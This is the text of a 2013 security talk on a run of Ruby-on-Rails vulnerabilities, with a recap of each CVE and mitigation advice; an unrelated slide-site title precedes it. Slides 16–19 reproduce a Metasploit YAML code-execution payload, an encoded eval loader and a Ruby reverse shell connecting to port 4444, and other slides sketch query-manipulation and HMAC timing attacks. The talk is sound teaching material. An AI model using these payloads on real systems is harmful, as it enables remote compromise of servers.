Apidays New York 2024 - The value of a flexible API Management solution for O...
Ruxmon feb 2013 what happened to rails
1. What happened to Ruby-
on-Rails?
Louis Nyffenegger
louis@pentesterlab.com
@snyff
2. About me...
● Independent security consultant:
○ Code review
○ Training
○ Penetration testing
● Work on really cool stuff in my free time:
○ https://pentesterlab.com/exercises
○ https://pentesterlab.com/bootcamp/
3. Ruby-On-Rails
● Ruby framework to develop web applications
● Protect from most web security issues:
○ SQL injections
○ Cross-Site Scripting
○ Cross-Site Request Forgery
● Good reputation... including security wise
4. What happened to Rails?
● Recently a lot of vulnerabilities have been
published in Ruby-On-Rails
● In the past, most vulnerabilities were low-risk
issues but nothing really bad
● This time we're talking remote code
execution
6. Non technical reasons
● People assumed it was secure
● More and more used:
○ more users -> more targeted
○ if an application didn't get any bug published it's
probably because no one cares
● A lot of Ruby hackers:
○ Ruby-on-Rails devs
○ People looking for bugs in Ruby-on-Rails and Ruby-on-
Rails applications
7. It all started... CVE-2012-5664
● Talk from Joernchen (Phenoelit) at ZeroNights:
"Let me github that for you" (21/12/2012)
● Rack Session (used by Rails):
○ base64(Marshal(data))--HMAC(SHA1(base64(Marshal
(data)), secret)
● PentesterLab's exercise on this:
https://pentesterlab.
com/rack_cookies_and_commands_injection.
html
8. It all started... CVE-2012-5664
● Session's secret exposed on Github:
○ Arbitrary session modifications
○ SQL injection if you know the secret and the application
uses authlogic
● Limited risk based on this... in theory
9. It all started... CVE-2012-5664
● As always... Twitter started screaming and
loling on this bug...
○ signal vs noise :/
● A lot of people (including me) thought it was
only exploitable in this condition:
http://blog.pentesterlab.com/2013/01/on-exploiting-cve-
2012-5664.html
http://blog.phusion.nl/2013/01/03/rails-sql-injection-
vulnerability-hold-your-horses-here-are-the-facts/
10. It all started... CVE-2012-5664
● If you want to do something like:
http://vulnerable/id[:select]=password from
users
● Rails prevents this
○ if you submit a hash, all keys get converted to
Strings.
○ then, Rails check that the keys submitted are valid
symbols:
def assert_valid_keys(*valid_keys)
unknown_keys = keys - [valid_keys].flatten
raise(ArgumentError, "Unknown key(s): #{unknown_keys.join(", ")}")
unless unknown_keys.empty?
11. All could have happily stop here...
but people started digging to find a
way around this...
12. And turned out...
● Rails can do a LOT of stuff...
○ parse traditional requests
○ parse XML request
○ parse JSON request
● And you can send YAML inside JSON and
XML requests...
13. YAML
● "YAML is a human-readable data
serialization format "(Wikipedia).
---
receipt: Oz-Ware Purchase Invoice
date: 2007-08-06
customer:
given: Dorothy
family: Gale
15. From YAML to code execution
● To translate that in the OS world:
"you have FTP access to a system and want
to get commands execution from it"
● Need to find a way to inject code and get it
executed...
● Many methods more or less reliable
depending on the version of Ruby and Ruby-
On-Rails
16. From YAML to code execution: msf
way
<SWfzexMD type='yaml'>--- !ruby/hash:
ActionController::Routing::RouteSet::
NamedRouteCollection 'XIH; eval(%[Y29k...
KZW5k].unpack(%[m0])[0]);' : !ruby/object:
ActionController::Routing::Route
segments: []
requirements:
:tFuEk:
:jyWUTgfc: :CAxk
</SWfzexMD>
17. From YAML to code execution: msf
way
● You basically inject code that will get
evaluated by Ruby-On-Rails automatically
● The same vulnerability can also be used to
get SQL injection using Arel
● From the code evaluated, msf does its usual
stuff:
○ fork
○ connect back
18. From YAML to code execution: msf
way
code = %(cmVxdW...ml9).unpack(%(m0)).first
if RUBY_PLATFORM =~ /mswin|mingw|win32/
[...]
else
if ! Process.fork()
eval(code) rescue nil
end
end
19. From YAML to code execution: msf
way
require 'socket';
c=TCPSocket.new("[::1]","4444");
$stdin.reopen(c);
$stdout.reopen(c); $stderr.reopen(c);
$stdin.each_line {|l|
l=l.strip
next if l.length==0
system(l)
}
20. CVE-2013-0156... only POST?
● Only POST?
○ you need to send the XML in the body of the
request...
● You can do a POST request and use the
HTTP header: "X-HTTP-Method-
Override: get"
to get Rails to use your payload as if it was
in a GET request
21. CVE-2013-0155
● "Unsafe Query Generation Risk in Ruby on
Rails" (not SQL injection) using JSON
● Depends on the code used
user = User.find_by_token(params[:token])
-> SELECT * FROM users where token=...
● You can manipulate the query using JSON
to remove the WHERE statement:
-> SELECT * FROM users
22. Rack
● "Rack provides a minimal interface between
web servers supporting Ruby and Ruby
frameworks."
● Used by Rails and other frameworks
● Two vulnerabilities published in the same
period:
○ CVE-2013-0262
○ CVE-2013-0263 (already reported in 2009)
24. Rack... CVE-2013-0263
● Timing attack...
○ Create a malicious value
○ Bruteforce a valid HMAC
■ send HMAC "aaaaaaaaaaa..."
■ send HMAC "baaaaaaaaaa..."
■ send HMAC "caaaaaaaaaa..."
■ ...
■ compare responses' time
● Unlikely from Internet
○ "intercloud" attacks...
25. CVE-2013-0277
● Rails allows developers to store serialized
data easily:
class Post < ActiveRecord::Base
serialize :tags
end
● Turns out the serialisation is done using
YAML... If a user can manipulate this
parameter... game over :/
26. Rack... CVE-2013-0262
● Directory traversal in Rack::File
● When I looked at the bug I found a XSS in
the same code
○ and another one in similar code in another file
fail(404, "File not found: #{path_info}"
○ and the fact that rack follows symlinks
● Turns out this is used by BEEF... Content-
Type: text/plain limits impact tho
27. Rubygems.org compromised
● Gem == ruby library
● Rubygems is like a Debian mirror for Ruby
● Information about a package are stored
inside a metadata.gz which is a compressed
YAML file... and this information get
displayed on the website:
○ Someone uploaded an "exploit.gem"...
28. So what to do from now?
● ".to_s all the things"
○ most of the issues come from the mapping
performed by Ruby-On-Rails
● Upgrade... (bundler-audit)
● Remove parsers you don't need:
ActionDispatch::ParamsParser::DEFAULT_PARSERS.delete(Mime::XML)
ActionDispatch::ParamsParser::DEFAULT_PARSERS.delete(Mime::JSON)
29. And since we are talking about Rails
Someone recently put together all the way to
have vulnerable code in Ruby-on-Rails:
http://rails-sqli.org/
You should also check Meder's Ruby
Security Reviewer's Guide:
http://code.google.com/p/ruby-
security/wiki/Guide